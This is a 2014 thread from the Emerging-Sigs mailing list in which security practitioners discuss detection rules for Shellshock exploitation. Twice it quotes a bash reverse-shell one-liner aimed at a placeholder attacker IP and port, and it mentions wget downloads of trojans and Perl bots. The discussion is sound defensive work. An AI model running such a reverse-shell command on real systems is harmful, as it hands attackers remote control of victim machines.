[Emerging-Sigs] Do you have a rule for this?

Livio Ricciulli livio at metaflows.com
Fri Sep 26 14:41:05 EDT 2014


Yes, we are seeing all kinds of stuff..
But I would think a rule for this would be good independently of the 
bash exploit..
Anything with

bash -i >& /dev/tcp/<bad_ip>/<bad port> 0>&1

in the payload is probably very bad..

Livio.

On 09/26/2014 11:25 AM, Will Metcalf wrote:
> Was thinking about this, and also  curl/wget/etc with args inbound to 
> web_servers. Have also seen direct wget's for ELF bins, Perl DDoS 
> bots, Perl Downloaders etc.
>
> Regards,
>
> Will
>
> On Fri, Sep 26, 2014 at 1:19 PM, Livio Ricciulli <livio at metaflows.com 
> <mailto:livio at metaflows.com>> wrote:
>
>     We have been seeing the bash exploit trying to execute:
>
>     bash -i >& /dev/tcp/<bad_ip>/<bad port> 0>&1
>
>     This will give the bad_ip a shell to the attacker. They would
>     typically execute a wget followed by Trojan install.
>
>     I was wondering do you already have a rule that detects the above?
>
>     if someone was executing that in anything would be bad I think..
>
>
>
>
>     _______________________________________________
>     Emerging-sigs mailing list
>     Emerging-sigs at lists.emergingthreats.net
>     <mailto:Emerging-sigs at lists.emergingthreats.net>
>     https://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
>     Support Emerging Threats! Subscribe to Emerging Threats Pro
>     http://www.emergingthreats.net
>
>

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20140926/13116c8a/attachment.html>


More information about the Emerging-sigs mailing list